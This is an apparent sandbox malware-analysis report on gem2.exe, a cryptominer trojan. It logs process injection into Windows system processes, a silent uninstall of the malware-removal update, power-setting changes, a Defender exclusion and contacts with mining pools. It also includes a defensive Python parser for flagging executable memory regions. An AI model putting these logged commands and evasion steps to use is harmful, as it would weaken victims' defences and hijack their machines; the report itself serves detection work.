          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DBFA540000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1200000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F8362A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20E3F2F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 238A0910000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E3DC7B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B9EDBC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EFFF1A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F910000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961B670000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961BA20000
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
Source: C:\Windows\System32\dialer.exe | Code function: 23_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_0000000140001B54
Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3318403400.0000011605AB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2108549670.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2108549670.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2108549670.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E8589636F0 cpuid 29_2_000001E8589636F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,29_2_000001E858987960
Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\gem2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gem2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F649000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
MITRE ATT&CK Matrix: tactics and the techniques with matched signatures (the number shown in the matrix cell is given in parentheses)

Execution: Windows Management Instrumentation (21), Native API (2), Service Execution (1)
Persistence: DLL Side-Loading (1), Windows Service (11)
Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (11), Process Injection (713)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Install Root Certificate (1), DLL Side-Loading (1), File Deletion (1), Rootkit (4), Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (131), Access Token Manipulation (1), Process Injection (713), Hidden Files and Directories (1)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (34), Security Software Discovery (441), Process Discovery (2), Virtualization/Sandbox Evasion (131), Application Window Discovery (1)
Collection: Archive Collected Data (1), Credential API Hooking (1)
Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (1), Application Layer Protocol (1)

No matched techniques are shown for Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration or Impact.
Behavior Graph ID: 1587388 | Sample: gem2.exe | Startdate: 10/01/2025 | Architecture: WINDOWS | Score: 100

Network nodes: pool.supportxmr.com; pool-fr.supportxmr.com; 3 other IPs or domains; 141.94.96.144 (port 49704 to 80, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, Germany), contacted by the second dialer.exe started from Lightshot.exe

Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 10 other signatures

gem2.exe (started)
  dropped: C:\ProgramData\Screenshots\Lightshot.exe, PE32+
  signatures: Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate
  started: dialer.exe; powershell.exe (Loading BitLocker PowerShell Module; started conhost.exe); cmd.exe (2 other processes); 13 other processes
  dialer.exe (from gem2.exe)
    signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to compare user and computer (likely to detect sandboxes)
    injected: lsass.exe; winlogon.exe; 2 other processes
    lsass.exe (injected)
      signatures: Installs new ROOT certificates; Writes to foreign memory regions

Lightshot.exe (started)
  dropped: C:\Windows\Temp\yycjbdwxjaoe.sys, PE32+
  signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
  started: dialer.exe (two instances); powershell.exe (started conhost.exe); 11 other processes
  dialer.exe (first instance)
    signatures: Injects code into the Windows Explorer (explorer.exe); Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
    started: 4 other processes
  dialer.exe (second instance)
    network: 141.94.96.144
    signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source | Detection | Scanner | Label
gem2.exe | 62% | Virustotal |
gem2.exe | 66% | ReversingLabs | Win64.Trojan.MintZard

Source | Detection | Scanner | Label
C:\ProgramData\Screenshots\Lightshot.exe | 66% | ReversingLabs | Win64.Trojan.MintZard
C:\Windows\Temp\yycjbdwxjaoe.sys | 5% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://172.94.1q | 0% | Avira URL Cloud | safe
http://3csp.icrosof4m/ocp0 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 141.94.96.195 | true | false | | unknown
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.35 | true | false | | high
pool.supportxmr.com | unknown | unknown | false | | high
                  NameSourceMaliciousAntivirus DetectionReputation
String: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
  Source: lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
  Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://schemas.xmlsoap.org/ws/2005/02/trust
  Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://docs.oasis-open.org/ws-sx/ws-trust/200512
  Source: lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
  Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://schemas.xmlsoap.org/ws/2004/09/policy
  Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://schemas.xmlsoap.org/wsdl/erties
  Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://schemas.xmlsoap.org/wsdl/soap12/
  Source: lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: http://3csp.icrosof4m/ocp0
  Source: lsass.exe, 00000024.00000002.3311887155.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
String: http://schemas.xmlsoap.org/wsdl/
  Source: lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
String: https://172.94.1q
  Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
String: https://xmrig.com/docs/algorithms
  Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
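The report export runs each string together with the first process name and the dump file names on one line (for example `...securitypolicylsass.exe, 00000024....sdmp, lsass.exe, ....sdmpfalse`), which hides the one detail in this table that matters for triage: the XMRig documentation URL is found in dialer.exe, a Windows phone-dialer binary, in a dump whose name carries base address 0000000140001000 and the value 00000040. The script below is an added example, not Joe Sandbox code. It splits such exported rows back into fields and decodes the dump names under an assumption that is inferred from the names on this page rather than documented: the fields are index.run.timestamp.base.protection.type.state.reserved and the protection field holds a Windows PAGE_* constant, so 00000004 is PAGE_READWRITE (the lsass.exe heap hits) and 00000040 is PAGE_EXECUTE_READWRITE at the default 64-bit image base, the shape of a payload mapped into dialer.exe by hand rather than loaded from disk. The sample rows are copied verbatim from the table above; the process-name list is taken from this report's own process list.

```python
"""Split the report's flattened string-in-memory rows back into fields and
decode the .sdmp names they cite. Added example, not Joe Sandbox code.
Assumed (inferred from the names on this page, not documented): a dump name is
index.run.timestamp.base.protection.type.state.reserved.sdmp and 'protection'
is a Windows PAGE_* constant."""
import re
from dataclasses import dataclass

PAGE_PROTECTION = {  # winnt.h memory-protection constants
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE_AND_EXECUTABLE = {0x40, 0x80}
# Names from this report's own process list, used to split the string from the
# process name the export fuses it with ("...securitypolicylsass.exe").
KNOWN_PROCESSES = {"gem2.exe", "powershell.exe", "winlogon.exe", "lsass.exe",
                   "svchost.exe", "dwm.exe", "dialer.exe"}
DUMP = (r"[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
        r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp")
SOURCE_RE = re.compile(r"(\S*?\.exe), " + DUMP)  # groups: process, base, protection


@dataclass(frozen=True)
class Hit:
    string: str
    process: str
    base: int            # region base address from the dump name
    protection: int      # PAGE_* value from the dump name
    malicious: bool
    reputation: str
    av_verdicts: tuple

    @property
    def protection_name(self):
        return PAGE_PROTECTION.get(self.protection, hex(self.protection))


def _blocks(lines):
    """Group each 'http...' row with the AV bullets and reputation line after it."""
    cur = None
    for line in (l.strip() for l in lines):
        if not line:
            continue
        if line.startswith("http"):
            if cur:
                yield cur
            cur = [line]
        elif cur is not None:
            cur.append(line)
    if cur:
        yield cur


def parse_hits(text, known=KNOWN_PROCESSES):
    blocks = list(_blocks(text.splitlines()))
    known = set(known)  # second and later sources are not fused, so learn from them too
    for b in blocks:
        known.update(m.group(1) for m in list(SOURCE_RE.finditer(b[0]))[1:])
    hits = []
    for b in blocks:
        row, matches = b[0], list(SOURCE_RE.finditer(b[0]))
        if not matches:
            continue
        fused = matches[0].group(1)
        name = max((n for n in known if fused.endswith(n)), key=len, default=None)
        if name is None:
            continue  # cannot split safely; leave the row for manual review
        malicious = row[matches[-1].end():].strip().lower() == "true"
        av = tuple(l.lstrip("• ").strip() for l in b[1:] if l.startswith("•"))
        reputation = next((l for l in b[1:] if not l.startswith("•")), "")
        for i, m in enumerate(matches):
            hits.append(Hit(fused[:-len(name)], name if i == 0 else m.group(1),
                            int(m.group(2), 16), int(m.group(3), 16),
                            malicious, reputation, av))
    return hits


def writable_executable(hits):
    """Strings sitting in RWX memory: typical of a manually mapped payload."""
    return [h for h in hits if h.protection in WRITABLE_AND_EXECUTABLE]


# Rows copied verbatim from the table above, in the flattened export form.
SAMPLE_ROWS = """
http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
high
http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
high
https://172.94.1qdialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://xmrig.com/docs/algorithmsdialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
high
"""

if __name__ == "__main__":
    for h in writable_executable(parse_hits(SAMPLE_ROWS)):
        print(f"{h.process} @ {h.base:#x} [{h.protection_name}]: {h.string!r}")
```

Run on the sample rows it reports both dialer.exe strings at 0x140001000 as PAGE_EXECUTE_READWRITE and none of the lsass.exe hits, which are ordinary PAGE_READWRITE heap pages holding WS-Security schema URLs. Rows whose fused prefix ends in a process name that is neither in KNOWN_PROCESSES nor learned from another row are skipped rather than guessed at.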
IP | Domain | Country | ASN | ASN name | Malicious
141.94.96.144 | unknown | Germany | 680 | DFN Verein zur Foerderung eines Deutschen Forschungsnetzes e.V. | true
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1587388
                                      Start date and time:2025-01-10 10:15:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:62
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:8
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:gem2.exe
                                      Detection:MAL
                                      Classification:mal100.spyw.evad.mine.winEXE@92/12@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 52.165.164.15, 13.85.23.206, 20.3.187.198, 40.126.32.72, 40.126.32.133, 40.126.32.138, 40.126.32.134, 40.126.32.136, 40.126.32.68, 40.126.32.76, 20.190.160.20, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type             Description
04:15:57  API Interceptor  1x Sleep call for process: gem2.exe modified
04:15:59  API Interceptor  35x Sleep call for process: powershell.exe modified
04:16:36  API Interceptor  419567x Sleep call for process: winlogon.exe modified
04:16:37  API Interceptor  336396x Sleep call for process: lsass.exe modified
04:16:37  API Interceptor  1114x Sleep call for process: svchost.exe modified
04:16:40  API Interceptor  402155x Sleep call for process: dwm.exe modified
04:16:42  API Interceptor  1854x Sleep call for process: dialer.exe modified
Match: 141.94.96.144 (IP)
Associated sample | Detection | Threat name
chrtrome22.exe | malicious | Xmrig
174.exe | malicious | Xmrig
file.exe | malicious | Xmrig
egFMhHSlmf.exe | malicious | Xmrig
kWYLtJ0Cn1.exe | malicious | LoaderBot, Xmrig
FieroHack.exe | malicious | Xmrig
h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig
curriculum_vitae-copie.vbs | malicious | Xmrig
curriculum_vitae-copie_(1).vbs | malicious | Xmrig
curriculum_vitae-copie.vbs | malicious | Xmrig
Match: pool-fr.supportxmr.com (domain)
Associated sample / URL | Detection | Threat name | Context (resolved IP)
chrtrome22.exe | malicious | Xmrig | 141.94.96.144
174.exe | malicious | Xmrig | 141.94.96.144
file.exe | malicious | Xmrig | 141.94.96.144
SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig | 141.94.96.71
file.exe | malicious | Xmrig | 141.94.96.71
egFMhHSlmf.exe | malicious | Xmrig | 141.94.96.71
xmr_linux_amd64 (2).elf | malicious | Xmrig | 141.94.96.195
xmr_linux_amd64.elf | malicious | Xmrig | 141.94.96.195
SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe | malicious | Xmrig | 141.94.96.144
Q3pEXxmWAD.exe | malicious | Xmrig | 141.94.96.195

